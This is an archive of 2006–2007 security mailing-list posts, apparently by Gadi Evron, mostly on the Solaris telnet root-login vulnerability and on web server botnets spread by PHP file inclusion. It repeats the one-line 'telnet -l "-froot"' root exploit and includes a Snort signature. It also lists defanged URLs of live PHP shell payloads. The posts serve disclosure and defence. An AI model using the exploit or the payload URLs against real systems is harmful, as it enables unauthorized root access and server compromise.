> On Tue, 13 Feb 2007, Gadi Evron wrote:
> 
> > We all agree it is not a very likely possibility, but I wouldn't rule it
> > out completely just yet until more information from Sun becomes
> > available.
> 
> What more information do you need? You have an advisory, access to the
> source code, access to the change that resolved the problem and 
> patient conversations with a very patient Casper Dik.
> 
> The onus is on you to demonstrate how this could be a backdoor.
> Otherwise you are asking Sun to prove a negative.
> 
> IMO fixing security bugs at short notice is painful enough without
> people like yourself and Steve Gibson casting assertions of malice.

I think you are a few days lagged. This was on-going and no real
"accusations" were made. Questions were asked. Information was made
available.

I'd like to re-iterate the following point, as just like you said, it has
staggering impact on how other vendors handle vulnerabilities.

Quoting -

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun.s response and
the level they were open to the community and industry on this without too
many PR/legal blocks getting in their way are very encouraging, releasing
information on the vulnerability, how it happened and why, a quick beta
patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age, is going to be with us for a
while.

Gadi.

> 
> -d
> 

Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?

[Gadi Evron]

On Thu, 15 Feb 2007, Joep Vesseur wrote:
> Gadi,
> 
> > [...]
> > One note: although it could just as well be a bug, who says it was not a
> > backdoor in the early 90's?
>  >
> > Also, I understand this does not work on older Solaris/SunOS systems
> > (anyone can verify?) 
> 
> I can. It is not present in anything before Solaris 10.
> 
> > which adds to my personal interest in the
> > possibility. I refuse to believe someone is that funny/sad.
> 
> Not sure what you mean here... You don't believe this is a (very
> unfortunate) accident?
> 
>  From where I stand (pretty close to the fire) this is pretty much
> what it looks like (an extended multi-file, multi-entrance-point
> change with unforseen and unnoticed interdependencies).

This needs to be further discussed, as your response here has been
awe-striking.

The remote possibility was raised, and for several reasons:
1. It just didn't seem to be possible such a vulnerability would exist,
yet it does.
2. It was a remote one (not raised by me, btw) which I wanted answers for
rather than let it die under the usual flames.
3. It was raised, we needed to discuss it.

Sun has been completely visible and did full-disclosure on the
vulnerability, how it got there, etc. I have to tip my hat to you and
thank you for your help with this.

I believe the entire industry should thank you, and follow your lead.

This is the first case where I have seen a vendor respond in such
fashion. It is to be commended yet again. You have proven what being open
with the community can achieve.

This is a serious F up on the side of Sun. Everyone makes mistakes
and incidents will happen no matter what. What matters here is how you
responded to the incident when it did happen.

Gadi.

> 
> Joep
> 

RE: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?

[Gadi Evron]

On Tue, 13 Feb 2007, Michael Wojcik wrote:

> > From: Thierry Zoller [mailto:[EMAIL PROTECTED] 
> > Sent: Monday, 12 February, 2007 07:52
> > 
> > GE> telnet -l "-froot" [hostname]
> > 
> > Should we really consider this a BUG ? With all due respect, this
> > reads, smells and probably tastes like a backdoor
> 
> It's a bug.  I recall it being found and fixed in AIX many years ago.
> Embarassing for Sun that it's still in Solaris, though.
> 
> It's actually caused by a "feature" of login; the bug is in programs
> that exec login and pass "-froot" to it, and in preserving this feature
> of login at all.
> 
> A quick Google search found Usenet postings about it from 1994; I'm sure
> it was known well before then.

Hi Michael. Thank you for making that issue public (about login). Haven't
seen it posted anywhere.

One note: although it could just as well be a bug, who says it was not a
backdoor in the early 90's?

Also, I understand this does not work on older Solaris/SunOS systems
(anyone can verify?) which adds to my personal interest in the
possibility. I refuse to believe someone is that funny/sad.

Gadi.

> 
> -- 
> Michael Wojcik
> Principal Software Systems Developer, Micro Focus
> 

defacements for the installation of malcode

[Gadi Evron]

Websense just released a blog post on how sites get defaced for malicious
purposes other than the defacement itself, such as installing mallicious
software on visiting users.

This is yet another layer of abuse of web server attack platforms.

You can find their post here:
http://www.websense.com/securitylabs/blog/blog.php?BlogID=109

Gadi.

Solaris telnet vuln solutions digest and network risks

[Gadi Evron]

A couple of updates and a summary digest of useful information shared from
all around on this vulnerability, for those of us trying to make sense of
what it means to our networks:

1. Sun released a patch (although it is not a final one). It can be found
on their site ( http://sunsolve.sun.com/tpatches - thanks to Casper Dik of
Sun, for those who have been following the discussion).

To quote: "the simplest possible fix on such short notice":
http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923

2. If you haven't already, I strongly recommend checking your network for
machines running telnet, and more specifcially, vulnerable to this
particular issue.

Several folks are speaking of third-party appliances running on Solaris,
as well as some back-end VoIP devices that have been confirmed as
vulnerable.

Apparently, telnet returns a different answer when this vulnerability is
used. We are not sure yet, but Noam Rathaus brought up the option that it
looks like the client responds with a "Won't Authentication Option" to the
server's "Do Authentication Option". This could perhaps be used to
actively detect the "attack".

3. If this solution is viable for you and you haven't already, ACLing
23/tcp at the border or from your user space may not be a bad idea, if it
won't kill anything. At least for now.

4. Bleeding Edge (ex Bleeding Snort) released snort signatures for this:
http://www.bleedingthreats.net/index.php/2007/02/12/solaris-remote-telnet-root-exploit-signature/

Quoting:

Chris Byrd has submitted an accurate signature for the exploit.
# Submitted 2007-02-12 by Chris Byrd
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:.BLEEDING-EDGE EXPLOIT
Solaris telnet USER environment
vuln.; flow:to_server,established; content: .|ff fa 27 00 00 55 53 45 52
01 2d
66|.; rawbytes; classtype:attempted-user; 
reference:url,riosec.com/solaris-telnet-0-day; sid:2003411; rev:1;)


4. An analysis of how this vulnerability works can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

And blogs by Sun on how this happened and was fixed (thanks to Georg
Oppenberg):
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
http://blogs.sun.com/danmcd/entry/how_opensolaris_did_its_job

And a fine explanation by Casper Dik on Bugtraq:
http://seclists.org/bugtraq/2007/Feb/0205.html

5. Apparently, this is the same vulnerability in 'login' that was in AIX
in 1994:
http://www.cert.org/advisories/CA-1994-09.html
http://osvdb.org/displayvuln.php?osvdb_id=1007

6. Vulnerable systems: reports are unclear, some or all of Solaris 10. No
earlier versions of Solaris/SunOS are vulnerable.

6. Other workarounds exist. Brad Powell suggested on Full-Disclosure:

Quoting:

For root login; there is a setting in /etc/default/login. If CONSOLE is
set, then root can only login on that device
i.e. "CONSOLE=/dev/ttya" means "root" can only login on ttya device. Any
other user via telnet/ssh/whatever has to login as themselves and "su" to
root.

This doesn't prevent telnet -l "-fbin", or -flp; for those accounts best
bet is to change /etc/passwd for the shell of system-account users to
/sbin/noshell or /bin/false (noshell just logs the entry and exists)

Of course disabling in.telnetd in /etc/inetd.conf (and doing a pkill -HUP
inetd) if possible is a safe bet,
but some sites are forced to use telnetd. 


Background:

The original post on this, with the "exploit", can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

A bit of background:
http://blogs.securiteam.com/index.php/archives/814

And some on how corporations responded as we saw from our own client base:
http://blogs.securiteam.com/index.php/archives/819

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging,
releasing information on the vulnerability, how it happened and why, a
quick beta patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age is going to be with us for a
while.

Gadi Evron.

Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >Yeah, a backdoor is a remote possibility. But it's also an arbitrary and
> >needlessly complex one. Maybe it's a nefarious plot by our UFO-appointed
> >shadow government, but chances are, it's not (they have better things to
> >do today).
> 
> And one which was too easy to discover; real back doors are better
> masquared as buffer overflows you might not chance upon.

We all agree it is not a very likely possibility, but I wouldn't rule it
out completely just yet until more information from Sun becomes
available.

There are a lot more relevant issues to discuss here regarding this
vulnerability, however, and we can move on from that moot point for now.

Thanks for your help and Sun's, Casper, but we would all like more
information.

> Casper
> 

Gadi.

Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Tue, 13 Feb 2007, Gadi Evron wrote:
> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> > 
> > >On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> > >> 
> > >> >
> > >> >Am I missing something?  This vulnerability is close to 10 years old.
> > >> >It was in one of the first versions of Solaris after Sun moved off of
> > >> >the SunOS BSD platform and over to SysV.  It has specifically to do w=
> > >> >ith
> > >> >how arguments are processed via getopt() if I recall correctly.
> > >> 
> > >> You're confused with AIX/Linux
> > >> 
> > >> Solaris did not have the -f option in login until much later.
> > >
> > >Hi Casper. While we have you here, any idea on when Sun will be patching
> > >this issue?
> > 
> > Now, follow the links from http://sunsolve.sun.com/tpatches
> > 
> > Casper
> > 
> 
> Many thanks Casper! Can you give some more information on exactly what is
> patched. Any Sun released advisory?

Specifically, more than:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1&searchclause=%22category:security%22%2420%22availability,%2420security%22%2420category:security

Because of the wide implications of this particular issue?

Also, any idea on how this vulnerability was introduced?

Thanks again,

Gadi.

Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> >> 
> >> >
> >> >Am I missing something?  This vulnerability is close to 10 years old.
> >> >It was in one of the first versions of Solaris after Sun moved off of
> >> >the SunOS BSD platform and over to SysV.  It has specifically to do w=
> >> >ith
> >> >how arguments are processed via getopt() if I recall correctly.
> >> 
> >> You're confused with AIX/Linux
> >> 
> >> Solaris did not have the -f option in login until much later.
> >
> >Hi Casper. While we have you here, any idea on when Sun will be patching
> >this issue?
> 
> Now, follow the links from http://sunsolve.sun.com/tpatches
> 
> Casper
> 

Many thanks Casper! Can you give some more information on exactly what is
patched. Any Sun released advisory?

Thanks again,

Gadi.

Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >
> >Am I missing something?  This vulnerability is close to 10 years old.
> >It was in one of the first versions of Solaris after Sun moved off of
> >the SunOS BSD platform and over to SysV.  It has specifically to do w=
> >ith
> >how arguments are processed via getopt() if I recall correctly.
> 
> You're confused with AIX/Linux
> 
> Solaris did not have the -f option in login until much later.

Hi Casper. While we have you here, any idea on when Sun will be patching
this issue?

Many thanks,

Gadi.

RE: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Tue, 13 Feb 2007, Oliver Friedrichs wrote:
> 
> Gadi,
> 
> It looks like I was confused, this actually affected AIX and Linux in
> 1994:
> 
> http://www.securityfocus.com/bid/458/info
> http://www.cert.org/advisories/CA-1994-09.html

Same same but with rlogin, as someone mentioned on DSHIELD.

Gadi.

> 
> Oliver
> 
> -----Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, February 13, 2007 1:46 AM
> To: Oliver Friedrichs
> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
> Subject: RE: Solaris telnet vulnberability - how many on your network?
> 
> On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
> > 
> > Am I missing something?  This vulnerability is close to 10 years old.
> > It was in one of the first versions of Solaris after Sun moved off of 
> > the SunOS BSD platform and over to SysV.  It has specifically to do 
> > with how arguments are processed via getopt() if I recall correctly.
> 
> Hey Oliver! :)
> 
> Well than, I guess it just became new again. And to be honest, I have to
> agree with a previous poster and suspect (only suspect) it could somehow
> be a backdoor rather than a bug.
> 
> The reason why this vulnerability is so critical is the number of
> networks and organizations which rely on Solaris for critical production
> servers, as well as use telnet for internal communication on their LAN
> (now how smart is that? I'd rather use telnet on the Internet than on a
> local LAN).
> 
> Further, there are quite a few third party appliances (some
> infrastructure back-end) that can not easily be patched running on
> Solaris (forget fuzzing or VA, people never even NMAP appliances they
> buy).
> 
> I am unsure of how long we will see this in to-do items of corporate
> security teams around the world, but I am sure Sun's /8 is getting a lot
> of action recently.
> 
> > 
> > Oliver
> 
>   Gadi.
> 
> > 
> > -Original Message-
> > From: Gadi Evron [mailto:[EMAIL PROTECTED]
> > Sent: Sunday, February 11, 2007 10:01 PM
> > To: bugtraq@securityfocus.com
> > Cc: full-disclosure@lists.grok.org.uk
> > Subject: Solaris telnet vulnberability - how many on your network?
> > 
> > Johannes Ullrich from the SANS ISC sent this to me and then I saw it 
> > on the DSHIELD list:
> > 
> > 
> > If you run Solaris, please check if you got telnet enabled NOW. If
> 
> > you
> > can, block port 23 at your perimeter. There is a fairly trivial
> > Solaris telnet 0-day.
> > 
> > telnet -l "-froot" [hostname]
> > 
> > will give you root on many Solaris systems with default installs
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> > 
> > 
> > You mean they still use telnet?!
> > 
> > Update from HD Moore:
> > "but this bug isnt -froot, its -fanythingbutroot =P"
> > 
> > On the exploits@ mailing list and on DSHIELD this vulnerability was 
> > verified as real.
> > 
> > If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it
> 
> > a strong suggestion.
> > 
> > Anyone else running Solaris?
> > 
> > Gadi.
> > 
> > 
> 
> 

RE: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
> 
> Am I missing something?  This vulnerability is close to 10 years old.
> It was in one of the first versions of Solaris after Sun moved off of
> the SunOS BSD platform and over to SysV.  It has specifically to do with
> how arguments are processed via getopt() if I recall correctly.

Hey Oliver! :)

Well than, I guess it just became new again. And to be honest, I have to
agree with a previous poster and suspect (only suspect) it could somehow
be a backdoor rather than a bug.

The reason why this vulnerability is so critical is the number of networks
and organizations which rely on Solaris for critical production servers,
as well as use telnet for internal communication on their LAN (now how
smart is that? I'd rather use telnet on the Internet than on a local LAN).

Further, there are quite a few third party appliances (some
infrastructure back-end) that can not easily be patched running on
Solaris (forget fuzzing or VA, people never even NMAP appliances they
buy).

I am unsure of how long we will see this in to-do items of corporate
security teams around the world, but I am sure Sun's /8 is getting a lot
of action recently.

> 
> Oliver 

Gadi.

> 
> -----Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Sunday, February 11, 2007 10:01 PM
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Solaris telnet vulnberability - how many on your network?
> 
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
> 
> 
> If you run Solaris, please check if you got telnet enabled NOW. If
> you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
> 
> telnet -l "-froot" [hostname]
> 
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 
> 
> You mean they still use telnet?!
> 
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
> 
> On the exploits@ mailing list and on DSHIELD this vulnerability was
> verified as real.
> 
> If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> strong suggestion.
> 
> Anyone else running Solaris?
> 
>   Gadi.
> 
> 

Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:


If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial
Solaris telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.


You mean they still use telnet?!

Update from HD Moore:
"but this bug isnt -froot, its -fanythingbutroot =P"

On the exploits@ mailing list and on DSHIELD this vulnerability was
verified as real.

If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
strong suggestion.

Anyone else running Solaris?

Gadi.

Web Server Botnets and Server Farms as Attack Platforms

[Gadi Evron]

Are file inclusion vulnerabilitiess equivalent to remote code
execution? Are servers (both Linux and Windows) now the lower hanging
fruit rather than desktop systems?

In the February edition of the Virus Bulletin magazine, we (Kfir
Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security) wrote
an article on cross platform web server malware and their massive use as
botnets, spam bots and generally as attack platforms.

Web security papers deal mostly with secure coding and application
security. In this paper we describe how these are taken to the next level
with live attacks and operational problems service providers deal with
daily.

We discuss how these attacks work using (mainly) file inclusion
vulnerabilities (RFI) and (mainly) PHP shells.
Further, we discuss how ISPs and hosting farms suffer tremendously from
this, and what can be done to combat the threat.

I'd like to write more on this here, and ask for the community's feedback
on what others see in this field and how you deal with similar issues.

Malware is often built to operate within a certain OS environment. Web
server malware is completely cross-platform (as long as a web daemon which
supports scripting can be found such as IIS, Apache, etc.). These malware
attack the web application first, and only then further compromise takes
place platform by platform, using the web server's privileges.

Most web servers are being compromised by these attacks as a result of an
insecure web application written in PHP, although attacks for other
scripting languages such as Perl and ASP are also in-the-wild.

The main reason for this is that many different PHP applications are
available online, and often freely as open source, which makes them a
popular selection for use on many web sites. Another reason for the
popularity of attacks against PHP applications is that writing securely in
PHP is very difficult, which makes most of these PHP applications
vulnerable to multiple attacks, with hundreds of new vulnerabilities
released publicly every month.

While in the past botnets used to be composed of mainly broadband end
users running Windows, today we can see more and more server botnets we
can refer to as "IIS botnets" or "Linux botnets" as a direct result of
these attacks.

One of the conclusions we reached was that although the technologies used
are not new (RFI, PHP shells, etc.) the sheer scale of the problem is
what's interesting.

In our research as detailed in the Virus Bulletin article we recognize
that vulnerabilities such as file inclusion, as simple as they may be, are
equivalent to remote code execution in effect.

Although escalation wars, which are reactive in nature, are a solution we
hate and are stuck with on botnets, spam, fraud and many other fronts,
this front of web server attacks stands completely unopposed and
controlled by the bad guys. In our research we detail how over-time, when
aggregated, most attacks come from the same IP addresses without these
ever getting blocked.

ISPs and hosting farms selling low-cost hosting services can not cope with
this threat, especially where an attack against one user running such an
application can compromise a server running 3000 other sites.

Another issue discussed was
the formation of the Web Honeynet Task Force
( http://www.webhoneynet.net/ renamed from the Web Honeynet Project to
avoid confusion with the honeynet project).

I write more about this and host the paper on my blog at SecuriTeam
( http://blogs.securiteam.com/index.php/archives/815 ). All
rights for the article itself belong to the Virus Bulletin magazine.

Gadi Evron.

Re: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

[Gadi Evron]

On Mon, 29 Jan 2007, Simple Nomad wrote:
> On Mon, 2007-01-29 at 13:00 -0600, Gadi Evron wrote:
> > How can we all automate the testing process for fake vulns in and list
> > them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?
> 
> How about letting them get posted to bugtraq as ppl test them out
> anyway? Usually the testing reports from various ppl on bugtraq bring up

They do get posted to bugtraq anyway. :)

> extra info such as "works on the previous version too" or "if foo=0 is
> in the config it doesn't work" etc, otherwise someone will want ALL
> versions tested before posting.
> 
> Bugtraq is probably about as automated as it gets, unless someone wants
> to send all their stuff to iDefense or TippingPoint who probably aren't
> going to touch the latest lame xss bug or php app bug.

Indeed, but for those of us trying to make some sense out of all this,
things are somewhat hazy. It is not about working hard or having more
work, it's about seeing if someone has any bright ideas on how to handle
this a bit better.

For example, remot file inclusion attacks are comparable to remote code
execution, testing each and every one of them is not always easy - but
something many of us do anyway.

Maybe it is time for a wiki/bugzilla sort of system to help get things run
more smoothly. Getting it running in this community won't be very easy
though.

You are right on the distribution..

> 
> -SN
> 

Re: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

[Gadi Evron]

How can we all automate the testing process for fake vulns in and list
them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?


On Sun, 28 Jan 2007, Stefano Zanero wrote:

> [EMAIL PROTECTED] wrote:
> 
> > local Calendar System v1.1 (lcStdLib.inc) Remote File Include
> 
> Fake vuln
> 
> > code :
> 
> The variables are set in config.php
> 
> > exploit:
> 
> You never tested them. Which is pretty lame.
> 
> Stefano
> 

Re: [Full-disclosure] Web Honeynet Project: announcement,

[Gadi Evron]

On Fri, 12 Jan 2007 [EMAIL PROTECTED] wrote:
> The Web Application Security Consortium is also doing such a project at
> http://www.webappsec.org/projects/honeypots/ . May be worthwhile to share 
> data perhaps?

My thoughts exactly!

Although.. it is high time we started getting out of the mindset that web
security equals code security (application security), it doesn't.

Most of these application security issues are important, if not
veru much so, but no matter how not trivial it is, they are
completely solvable.

It's time to get rid of useless application firewalls, etc. and face the
music that there is currently a world of attacks we don't escalate
against and mostly do not know how to defend against on a large
scale. Take a look at zone-h if you need a reality check.

Most of the attacks described in my email are happening from the same IP
addresses, this is open relay days all over again, and it's time to wake
up and start the spam war.

Mitigate the threats by taking down bad sites, filter out bad URLs, filtr
out attacking IP addresses, detect Linux and webserver malware,
etc.
Naturally, also remember the coding issues that caused it, and how we can
fix them. We should also not forget PHP and its contribution to this
mess.

Gadi.

Web Honeynet Project: announcement, exploit URLs this Wednesday

[Gadi Evron]

[ Warning: this email message includes links to live web server malware
propagated this Wednesday via file inclusions exploits. These links are
not safe! ]

Hello.

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will
in the next few months announce research on real-world web server attacks
which infect web servers with:
Tools, connect-back shells, bots, downloaders, malware, etc. which are all
cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL
injection and XSS attacks every web security expert loves so much, but
just with malware and code execution attacks on web servers and hosting
farms.

These attacks form botnets constructed from web servers (mainly IIS and
Apache on Linux and Windows servers) and transform hosting farms/colos to
attack platforms.

Most of these "tools" are being injected by (mainly) file inclusion
attacks against (mainly) PHP web applications, as is well known and
established.

PHP (or scripting) shells, etc. have been known for a while, as well as
file inclusion (or RFI) attacks, however, mostly as something secondary
and not much (if any - save for some blogs and a few mailing list posts a
year ago) attention was given to the subject other than to the
vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive
fashion and force ISPs and colos to combat an impossible situation where
any (mainly) PHP application from any user can exploit entire server
farms, and where the web vulnerability serves as a remote exploit to be
followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact we now start engaging the bad
guys on this front (which so far, they have been unchallenged on) -
meaning aside for research, the Web Honeynet Project will also release
actionable data on offensive IP addresses, URLs and on the tools
themselves to be made available to operational folks, so that they can
mitigate the threat.

It's long overdue that we start the escalation war with web server
attackers, much like we did with spam and botnets, etc. years ago. Several
folks (and quite loudly - me) have been warning about this for a while,
not it's time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet
Project information for this last Wednesday, on file inclusion attacks
seeding malware.
You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such
tools) will be made public in the February edition of the Virus Bulletin
magazine, from:
Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project would like to thank
Beyond Security ( http://www.beyondsecurity.com ) for all the support.

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the
new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and
operations hybrid project (you know who you are).

Gadi.

Sample report and statistics (for Wednesday the 10th of January, 2007):

IP | Hit Count | Malware (Count), ... |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), 
http://m embers.lycos.co.uk/onuhack/injek.txt? (6), 
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w
ww.clubmusic.caucasus.net/administrator/cmd.gif? 
(1), http://c lubmusic.caucasus.net/administrator/cmd.gif? (4), 
http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (5), 
http://t bchat.caucasus.net/cmd.gif? (1),
216.22.3.11 | 8 | http://h eidi.by.ru/cmdi.txt? (7), 
http://h eidiz.by.ru/cmdi.txt? (1),
62.149.36.116 | 8 | 
http://w ww.fc-magdeburg.de/jscripts/tiny_mce/plugins/pic.gif?? (3), 
http://w ww.discoverchimpanzees.org/blog/sendit.jpg?? (2), 
http://u bk.no-ip.biz/shine.jpg?? (1), 
http://w ww.sle.br/polvo2/script/ftv3doc.gif?? (1), 
http://w ww.sle.br/polvo2/css/css.gif?? (1),
85.25.148.178 | 7 | h ttp://213.133.108.122/alex.gif? (1), 
http://c lubmusic.caucasus.net/Administrator/cmd.gif? (5), 
http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (1),
69.13.6.170 | 7 | http://c ajem.by.ru/cmd.gif? (3), 
http://k ama.opensolarisproject.com/phpBB2/files/cmd.gif? (1), 
http://s upsup.by.ru/cmd.gif? (2), http://w
ww.bhlynx.org/htdig/sad.gif? (1),
201.63.179.122 | 7 | http://d arkhand.netfast.org/list.txt??? (2), 
http://w ww.locman.net/Guide/vkod/list.txt?? (3), http://g
odarmy.net/cmd.txt?? 
(1), http://c hapolin.by.ru/cmds/list.txt? (1),
219.67.171.131 | 7 | http://i ntra/ (7),
193.39.119.174 | 6 | http://w ww.sirmet.it/pronti/cmd.txt?? (1), 
http://w ww.overclockers.pl/images/r57.gif? (1), 
http://w
ww.rldiseno.com/administrator/components/com_remository/morgancmd.gif? 
(1), http://v irt

Re: a cheesy Apache / IIS DoS vuln (+a question)

[Gadi Evron]

On Wed, 3 Jan 2007, William A. Rowe, Jr. wrote:
> Michal Zalewski wrote:
> > I feel silly for reporting this, but I couldn't help but notice that
> > Apache and IIS both have a bizarro implementation of HTTP/1.1 "Range"
> > header functionality (as defined by RFC 2616). Their implementations allow
> > the same fragment of a file to be requested an arbitrary number of times,
> > and each redundant part to be received separately in a separate
> > multipart/byteranges envelope.
> 
> Batten down the hatches!
> 
> >   (An example would be an "old-fashioned" attack on a server that happens
> >   to host multi-gigabyte ISO files or movies - simply request them
> >   many times and let window scaling do the rest... of course, most
> >   high-profile sites are smart enough to host static HTML and basic layout
> >   elements separately from such bandwidth-intensive and non-essential
> >   content, so it still makes sense to take note of "Range" behavior).
> 
> Seriously, HTTP pipelining can accomplish EXACTLY the same thing with minimal
> pain.  If you have an issue with this behavior, of HTTP, then you have an
> issue with the behavior under FTP or a host of other protocols.  And as you
> say, simple enough to find some 1.5mb pdf's.  But you expect 1gb window sizes
> to actually succeed?
> 
> In 95% of the cases that follow your comment above, although the load may
> be often be distributed between boxes based on computational intensity, it
> is nearly always shoved down the same pipe in the end.
> 
> > Combined with the functionality of window scaling (as per RFC 1323)
> 
> is exactly where your concern should lay - socket kernel-level control of
> unrealistic window scaling, and similar scaling restrictions at the router
> layer.
> 
> With the host of real issues out there in terms of massively parallel DDoS
> infrastructures that abound, this is, as you say, quite a silly report.

Wrong. Any vulnerability, no matter how many others are out there or how
unlikely, is indeed a vulnerability.

As one of the people leading the battle againt what you refer to as
"massively parallel DDoS infrastructures", I can tell you I am almost
inclined to giggle here.

Is all you are saying: "YES but mine is better?"

Gadi.

Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page

[Gadi Evron]

On Thu, 14 Dec 2006, Jerome Athias wrote:
> Gadi Evron a écrit :
> > On Tue, 12 Dec 2006, Joxean Koret wrote:
> >   
> >> Wow! That's fun! The so called "Word 0 day" flaw also affects
> >> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> >> with the file:
> >> 
> >
> > This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> > mode, on a mailing list (fuzzing mailing list).
> >
> > I am not sure why I got this 10 times now, I thought the days of these
> > bounces were over. But I am tired of seeing every full-disclosure
> > vulnerability called a 0day anymore.
> >
> > A 0day, whatever definition you use, is used in the wild before people are
> > aware of it.
> It makes sense and I totally agree with you.
> But the fact is that the things change (and not allways in the right 
> direction :-()... due to the society, money, research of popularity...
> Please remember us also the sense of the word "hacker" for instance, 
> since nowadays it's often use to speak about "bad guy/blackhat/pirate" - 
> i hope you'll agree that it's not the (our) sense

This battle is not lost. If we call it the right name and talk to the
press using the right terms, it is not lost yet. Maybe it should be, but
it is really confusing when it gets to the professional community.

> 
> /JA
> 

NOT a 0day! Re: [fuzzing] [Full-disclosure] OWASP Fuzzing page

[Gadi Evron]

On Tue, 12 Dec 2006, Joxean Koret wrote:
> 
> Wow! That's fun! The so called "Word 0 day" flaw also affects
> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> with the file:

This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
mode, on a mailing list (fuzzing mailing list).

I am not sure why I got this 10 times now, I thought the days of these
bounces were over. But I am tired of seeing every full-disclosure
vulnerability called a 0day anymore.

A 0day, whatever definition you use, is used in the wild before people are
aware of it.


> 
> [EMAIL PROTECTED] $ abiword 12122006-djtest.doc
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> [EMAIL PROTECTED] $ ooffice 12122006-djtest.doc
> OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
> Using existing OpenOffice.org
> Application Errorsh: line 1: crash_report: command not found
> Application Error
> 
> Fatal exception: Signal 6
> Stack:
> /usr/lib/openoffice/program/libsal.so.3[0xb72e13ec]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1579]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1644]
> [0xe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt
> +0x53)[0x8063029]
